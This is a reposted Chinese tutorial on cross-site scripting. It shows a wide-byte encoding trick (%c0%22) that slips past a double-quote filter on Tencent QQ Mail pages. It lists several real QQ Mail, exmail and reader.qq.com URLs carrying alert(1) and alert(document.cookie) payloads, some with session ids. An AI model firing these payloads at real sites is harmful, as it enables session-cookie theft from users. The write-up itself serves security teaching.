4.宽字节复仇记[QQ邮箱基本通用]

最新推荐文章于 2022-03-15 17:11:38 发布
最新推荐文章于 2022-03-15 17:11:38 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 那些年我们一起学XSS(腾讯实例)
原文链接:http://www.pkav.net
版权

作者:心伤的瘦子

来自:PKAV技术宅社区

网址:http://www.pkav.net

----------------------------------------------------------------------------------

简要描述:

前面教程第2节,说到了输出在<script>..</script>之间的情况。也说到了后面会再继续一些有意思的例子。

实际上,我们碰到的往往不是那么好。很多情况下,程序员都是会过滤的。那么我们怎么办呢?

“因地制宜,因材施教。”根据漏洞的实际情况,我们可以各种绕过。不知道这里乱用成语没啊。惶恐不安中。

这里先看看第一种方法,宽字节绕过。

详细说明:

1.有一个比较经典的SQL注入,是宽字节注入。玩渗透的可能对这个都比较清楚2.有时候,宽字节确实可以带来奇效~~下面我们看腾讯的一个例子。

2.例子如下:

http://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%22;alert(1);//aaaaaa
我们尝试注入 " 来闭合前面的双引号,但是很悲剧的是,双引号被过滤了。。
如下图

看到这种情况,一般人估计会放弃了吧,至少说明程序员注意到了这里,并且过滤了。
然后我们可以看到编码是:
<meta http-equiv="Content-Type" content="text/html; charset=gb18030" />
gbxxxx 系列的编码,那么我们尝试一下宽字节呢?
http://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%c0%22;alert(1);//aaaaaa
看看效果:

弹个窗:

 

                                             图15

利用宽字节,我们华丽的复仇了“腾讯对双引号的屠杀”

6.至于这个漏洞的成因,和传统的宽字节漏洞并不一样。目测应该是由于过滤双引号的正则表达式写得有问题造成的。并不是因为%22变成了%5c%22,而%c0吃掉了后面的%5c。而后面这种情况,在腾讯的相关站点暂时没有发现实际案例。如果有,欢迎大家分享。

不一一列举了。有这个参数的基本都有问题。
http://msgopt.mail.qq.com/cgi-bin/readtemplate?sid=ktqO7DjMQcJuAABQ&folderid=9&page=0&t=aaaa%c0%22;alert(1);//bbbbx&l
oc=folderlist,,,9
http://r.mail.qq.com/cgi-bin/reader_main?sid=ktqO7DjMQcJuAABQ&t=aaaa%c0"bbbbx&source=folderlist
https://exmail.qq.com/cgi-bin/bizmail?sid=N7fzoGwkeI8ydyRo,7&action=show_user&alias=zhaopin@ucanlove.com&t=%c0"ccccbb
bbx&s=showaccount
https://exmail.qq.com/cgi-bin/loginpage?errtype=3&verify=true&clientuin=info&t=dm_loginpage&d=fartech.cn&s=&alias=&re
galias=&delegate_url=&title=&url=%2Fcgi-bin%2Flogin%3F&org_fun=&aliastype=other&ss=&from=&autologin=n&param=&sp=&r=b6
3f6de34c24eeb8a3099ab4bbfc1b8d&ppp=&secpp=%c0%22onmousebbbb=alert(document.cookie);//&dmtype=bizmail
http://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%c0"ccccbbbbx
http://open.mail.qq.com/cgi-bin/communication?sid=,2,zh_CN&t=%c0"ccccbbbbx&action=
http://open.mail.qq.com/cgi-bin/feedback_loop?sid=,2,zh_CN&check=false&t=%c0"ccccbbbbx&action=
http://exmail.qq.com/cgi-bin/viewdocument?sid=H6Mg9z5XNfqsfhdH,7&filename=%CC%EC%BD%F2%BB%C6%BD%F0%C8%D5%D6%DC%C6%C00
917.doc&mailid=ZL2017-RfnEvncOeLfhJ04eTPrSU29&retry=true&t=%c0%22ccccbbbbx&ef=qfunc
http://reader.qq.com/cgi-bin/rss_main?sid=MTOtOYwpx56MMzN9&t=aaaa%c0%22;alert(document.cookie);//bbbbx&s=mag&r=222&in
it=true&update=1

7.修复方案:

修复相关过滤机制

红烧兔纸
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
字节注入
weixin_45253622的博客
03-18 6510
字节注入 漏洞原理 字节注入是由于不同编码中中英文所占字符的不同所导致的。 通常来说,在GBK编码当中,一个汉字占用2个字节。而UTF-8编码中,一个汉字占用3个字节。 在一般的sql注入时,参数id=1在数据库查询时是被单引号包围的。当传入id=1’时,传入的单引号又被转义符(反斜线)转义,导致参数ID无法逃逸单引号的包围,所以在一般情况下,此处是不存在sql注入漏洞的。 不过有个特例,就是当数据库的编码是GBK时,可以使用字节注入,字节的格式是在地址后先加一个%df ,再加单引号,因为反斜杠的编
SQL注入进阶之1字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4498
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是字节注入。 原理讲解 接下来的讲解,将以问...
安全、漏洞信息发布平台
weixin_34232617的博客
09-12 231
1.WooYun:乌云安全漏洞报告平台 www.WooYun.org2.CNNVD:中国国家漏洞库 www.cnnvd.org.cn3.SCAP中文社区:(安全内容自动化协议)http://www.scap.org.cn4.Sebug漏洞库(Sebug漏洞库: 漏洞目录、安全文档、漏洞趋势)http://sebug.net5.文件处理信息泄露漏洞 http://url.c...
米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
热门推荐
龙哥盟
02-23 4万+
米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。通过爆破工具就可以很容易破解用户的弱口令。
Pkav HTTP Fuzzer教程
夏日 の blog
02-11 1万+
以Hacking Lab的验证码题为例 题目 对Pkav HTTP Fuzzer配置 1.标记爆破的位置,图形验证码,选择字典 2.设置验证码范围 3.添加验证码地址,进行相关设置 tips:下方可进行识别测试 4.本题需要设置验证码识别模式为单线程 点击下方重放选项选择单线程 4.发包器页面启动爆破 根据长度判断是否成功(点击长度即可自动排序) ...
5.反斜线复仇记
→_→
05-09 355
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net --------------------------------------------------------------------------------------------------------------------------------- 简要描述: 还是在<script>之间的场景,某些情况下,我们仅仅需要的只是一个反斜线,就可以绕过过滤了。 详细说明: 1.有以下实例点
心伤的瘦子腾讯xss系列(21篇)
11-11
最全面的xss教程,全腾讯site实战,心伤的瘦子大佬出品,21篇
小傅哥的字节码编程(公众号:bugstack虫洞栈).pdf
06-08
市面上以及网络搜索中都基本很少有成体系的关于字节码编程的知识,这主要由于大部分开发人员其实很少接触这部分内容,包括;ASM、Javassist、Byte-buddy以及JavaAgent,没有很大的市场也就没有很多的资料。但大家...
字节编码类型的XSS
安全汪
06-25 3677
今晚又看了一遍PKAV-心上的瘦子写的xss腾讯系列的例子,收获挺大的,其中对字节注入有了更深的了解,又查找了一些相关的资料,整理一下,以备以后查阅 参考文档: http://book.2cto.com/201301/14515.html http://itindex.net/detail/47408-xss-%E5%AD%A6%E4%B9%A0-xss http://ww
sql注入绕过addslashes函数-字节注入
G208_522的博客
03-15 4674
字节注入 字节注入要求: 1、数据库的编码为GBK 2、addslashes()函数,检测在单引号前加\ addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(") 反斜杠(\) NULL 一、单引号探测 http://localhost:8899/sqli-lab/Less-33/index.php?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为G
fragmenttransaction的函数都无法使用_前端大佬都在使用的JavaScript工具函数宝典(内含95个工具函数)...
weixin_33208553的博客
01-05 354
01 为元素添加on方法Element.prototype.on = Element.prototype.addEventListener;NodeList.prototype.on = function (event, fn) {、 []['forEach'].call(this, function (el) { el.on(event, fn); }); ret...
android:微信分享到回话 ,无法跳转到微信界面
TaLinBoy的博客
01-07 6723
先到微信开发者平台注册微信应用:如下为一些申请信息,审核通过之后可修改。 其中应用签名:可以在下面的链接地址中找到工具: https://open.weixin.qq.com/cgi-bin/readtemplate?t=resource/app_download_android_tmpl&lang=zh_CN 资源链接地址中的签名工具apk安装到手机,同时安装自己的apk,通过
18. XSS过滤器绕过 [猥琐绕过]
→_→
05-22 585
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ---------------------------------------------------------------------------------------------------------- 简要描述: 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通用绕过不同的是,它通用性小,往往只是特例。 详细说明: 1. 直接看实例点:
Tomcat8、9配置https SSL证书 阿里云的免费dv证书
QC班长的博客
10-11 4831
此文环境是Windows Sever2008 R2, Tomcat8.5, Tomcat9都可以。https是用的阿里云的免费dv证书,tomcat绑定的是pfx证书(Tomcat支持JKS格式证书,从Tomcat7开始也支持PFX格式证书,两种证书格式任选其一)。 在申请到阿里云的免费DV证书后,下载 "证书 for Tomcat",阿里云证书安装配置说明https://yundun.cons...
4.24
周周的博客
04-24 179
在区间[1,n] 里面求出满足 gcd(x, n) &gt;= m 的x有多少个(m&lt;=n)。看到这个题目的我第一眼感觉就是枚举m,m+1,···,n把m,m+1,···,n除过去,就是求phi(n/m),phi(n/(m+1)),···phi(n/n),这个与以前gcd(x,y)==k把k除过去不大一样,这里的m一定是n的因子,这样做TLE,换个角度想。也可以这样做,这种方法常用,就是枚举...
iOS问题记录本:UIWebView可以打开不受信任的https网页,但是网页中的动态资源css/image无法加载
FantasyWind-奇风的悟道之地
05-30 2793
0.背景描述 项目中在之前版本已经兼容了打开https网页的功能,但之前因为网页证书受信任,所以打开没有什么问题。 最近一次迭代中,发现有个功能打开的网页,网页没有加载样式,布局全部乱掉。 1.问题查找 1)定位原因 通过safari开发模式查看网页,发现加载样式表和图片时提示: The certificate for this server is invalid. You m...
QQ企业邮箱发送邮件
guchunchao的专栏
07-31 1万+
POP3/SMTP协议 接收邮件服务器:pop.exmail.qq.com ,使用SSL,端口号995 发送邮件服务器:smtp.exmail.qq.com ,使用SSL,端口号465 海外用户可使用以下服务器 接收邮件服务器:hwpop.exmail.qq.com ,使用SSL,端口号995 发送邮件服务器:hwsmtp.exmail.qq.com ,使用SSL,端口号465 IMAP协议 ...
PostgreSQL+phpPgAdmin总是登录失败(login failed)
qdd0818的专栏
12-09 5156
我的配置步骤: postgresql-8.4.11.tar.gz phpPgAdmin-5.1.tar.bz2 1、解压到服务器apache所在的DocumentRoot的目录下(具体的目录可以通过phpinfo来查找,我的是在DOCUMENT_ROOT->  /var/www/html) cd /var/www/html/ #tar jxvf phpPgAdmin-5.1.tar.bz
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值